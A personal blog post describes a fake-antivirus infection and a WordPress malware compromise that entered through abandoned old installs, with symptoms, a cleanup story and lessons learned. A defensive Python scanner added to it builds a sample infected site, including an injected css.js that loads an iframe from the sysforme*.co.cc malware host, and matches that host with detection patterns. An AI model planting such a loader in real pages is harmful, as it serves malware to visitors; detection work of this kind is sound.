
This blog got hacked again!

Early last week, one of my laptops got infected. Someone had placed fake antivirus software on it, and the only options to get rid of the pop-up window were either to visit their site or to buy the software.

After checking the McAfee Community Forum, I figured out the source of the problem. I then visited this site and followed the great instructions there to clean up this AV Security 2012 virus.

What made me mad was the fact that the Real Time Scanning function of my McAfee Total Protection software had been disabled for no apparent reason, and I could not restart it. This had been going on for a while, and I could not figure out the reason. However, I believed that turning off the function had allowed this fake antivirus software to get into my laptop.

The discussions in the McAfee Community Forum seemed to blame the registry cleaner software installed on my laptop as the culprit. When scanning the system, this registry cleaner software also disabled those McAfee Total Protection functions.

Well, lightning may not strike you twice. However, bad things may hit you in a row.

As soon as I had cleaned up my system, removing the virus as well as the registry cleaner software and then removing and reinstalling my McAfee Total Protection to reactivate its real-time scanning function, I got an email from a friend. He said that when he accessed our church’s website, which I managed, his virus protection software had to stop and clean a Trojan coming from the website. It infected my microcomputer, he said.

If that was not enough, when I opened this blog the next day, I found this page displayed in my Firefox browser:

Internet Explorer would let you visit the page, but please take a look at the Google search result for my blog that I found that day by clicking on the figure below. You will see a warning message saying “This site may harm your computer” listed after the link, as shown below:

I have seen this message many times in the past for other websites. At that point I realized I’d have no time to work on it myself, so I contacted sucuri.net to do the job for me. Unfortunately, a few hours after they cleaned up the blog, it got infected again. But that was how we found the culprit. Here is the message I received from sucuri.net:

“While cleaning the site we found an outdated version of WordPress on the server. This is a security risk considering this version has known vulnerabilities. We recommend that you have this updated or removed from the server.”

I then went to all the servers for all my sites and removed every old WordPress installation that I had placed in different folders on those servers. In the early days, I had installed the WordPress software in different folders to create a blog for a friend or for other topics, then left those folders there once the project was completed. There was no active site in those folders. Apparently the perpetrator had exploited the hole in the old version of WordPress to create a gateway for their malware to get into all my servers.

Google only found and blocked this site, but all my other sites that had old WordPress versions installed also got infected by the same malware.

Here are some of the symptoms when the site got infected by this malware, which caused Google to block my site:

  • It takes a long time for the site to open. Sometimes you may see a message in the status bar at the bottom saying: “waiting for a file from sysformexxxx.co.cc/main.php?page=a911bd6268796cac”. The number xxxx may differ from site to site, but the rest looks the same.
  • There are some backdoor files installed in the old WordPress folder.
  • If you look at the root directory, you will see a JavaScript file, css.js, with a new timestamp.
  • If you look at the infected files, particularly your index.htm(l) file, you will see a call to this css.js file right after the body tag.
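The symptoms above are all things you can check for mechanically across a web root, and the same walk can find the abandoned WordPress copies that turned out to be the entry point. The script below is an added example written for this post, not a tool from the author or from sucuri.net: it flags index files that call css.js right after the body tag, any file referencing the sysforme*.co.cc/main.php loader, css.js files with a recent timestamp, and every wp-includes/version.php whose core version is older than the version you pass in. The sample site it builds in a temporary directory is constructed data (the digits in sysforme1234 and the old version numbers are made up), and '3.2.1' is only a placeholder for whatever the current WordPress release is when you run it.

```python
import os
import re
import tempfile
import time

# Indicators taken from the symptom list above. The xxxx in sysformexxxx.co.cc
# varies per site, so the host pattern is left open.
INJECTED_CSS_JS = re.compile(
    r'<body[^>]*>\s*<script[^>]*\bsrc=["\']?[^"\'>\s]*\bcss\.js\b', re.IGNORECASE)
MALWARE_HOST = re.compile(r'sysforme\w*\.co\.cc/main\.php', re.IGNORECASE)
# WordPress records its core version in wp-includes/version.php as $wp_version = '...';
WP_VERSION = re.compile(r"\$wp_version\s*=\s*'([^']+)'")
TEXT_EXTENSIONS = ('.htm', '.html', '.php', '.js')


def version_tuple(version):
    """'3.10.1' -> (3, 10, 1), so releases compare numerically rather than as strings."""
    return tuple(int(part) for part in re.findall(r'\d+', version))


def scan_site(root, known_good_wp, recent_days=7, now=None):
    """Walk a web root and return the indicators found under it.

    injected_pages:  index files that call css.js immediately after <body>
    malware_refs:    files that name the sysforme*.co.cc/main.php loader
    recent_css_js:   css.js files modified within the last recent_days days
    stale_wordpress: (install dir, version) for every core older than known_good_wp
    """
    now = time.time() if now is None else now
    cutoff = now - recent_days * 86400
    findings = {'injected_pages': [], 'malware_refs': [],
                'recent_css_js': [], 'stale_wordpress': []}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            if name == 'css.js' and os.path.getmtime(path) >= cutoff:
                findings['recent_css_js'].append(rel)
            if not name.lower().endswith(TEXT_EXTENSIONS):
                continue
            with open(path, encoding='utf-8', errors='replace') as fh:
                text = fh.read()
            if name.lower().startswith('index.') and INJECTED_CSS_JS.search(text):
                findings['injected_pages'].append(rel)
            if MALWARE_HOST.search(text):
                findings['malware_refs'].append(rel)
            if name == 'version.php' and os.path.basename(dirpath) == 'wp-includes':
                match = WP_VERSION.search(text)
                if match and version_tuple(match.group(1)) < version_tuple(known_good_wp):
                    install = os.path.relpath(os.path.dirname(dirpath), root).replace(os.sep, '/')
                    findings['stale_wordpress'].append((install, match.group(1)))
    return {key: sorted(items) for key, items in findings.items()}


def build_sample_site():
    """Build a throw-away tree of constructed files mimicking the symptoms (sample data, not the author's site)."""
    root = tempfile.mkdtemp(prefix='wp-triage-')

    def write(rel, content, mtime=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

    now = time.time()
    # Infected front page: the css.js call sits right after the body tag.
    write('index.html', '<html><body>\n<script type="text/javascript" src="css.js"></script>\n'
                        '<p>Welcome</p></body></html>')
    # Freshly dropped loader pulling main.php from the throw-away domain (digits made up).
    write('css.js', "document.write('<iframe src=\"http://sysforme1234.co.cc/main.php"
                    "?page=a911bd6268796cac\"></iframe>');", mtime=now - 3600)
    # Abandoned test blog left on an old core: the kind of folder the post describes.
    write('oldblog/wp-includes/version.php', "<?php\n$wp_version = '2.8.4';\n")
    # A current install, a clean page and an old css.js show what is not flagged.
    write('blog/wp-includes/version.php', "<?php\n$wp_version = '3.2.1';\n")
    write('about/index.html', '<html><body><p>Clean page</p></body></html>')
    write('legacy/css.js', '/* untouched helper script */', mtime=now - 400 * 86400)
    return root


if __name__ == '__main__':
    site = build_sample_site()
    # '3.2.1' stands in for whatever the current WordPress release is when you run this.
    for key, items in scan_site(site, known_good_wp='3.2.1').items():
        print(f'{key}: {items}')
```

Run it against a real document root with the current WordPress version in place of '3.2.1'; anything in stale_wordpress is a copy to delete or update, and a hit in injected_pages or recent_css_js is a page to restore from a clean backup rather than hand-edit, since the backdoor that wrote it is usually still somewhere in the old install.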

Here is what Google said about the infection. Please click on the picture to see the actual image:

Based on the information from sucuri.net, I then removed all the old WordPress files to close the backdoor on all my other servers, removed all the malware links, and scanned the sites using the free scan utilities of sucuri.net.

So far, all the sites seem to work again, and Google has also unblocked this site after both sucuri.net and I separately requested that Google unblock it and a scan using various site advisor scanners no longer found the threat.

Lessons learned:

  • Update your software when a new version comes out, particularly when the new one is released because of a security flaw in the old version.
  • Remove all unused application software, including any WP themes you are no longer using.
  • Update your antivirus software and scan your system periodically.
  • Get the help of an expert if needed.

Sucuri.net has a good article on what to do after your site is fixed. In addition, Dre Armeda of sucuri.net has a video presentation on WordPress End-User Security here. Please check it out!

Happy Thanksgiving!

Disclaimer: Please consult an expert if your site gets infected. This is for your information only.
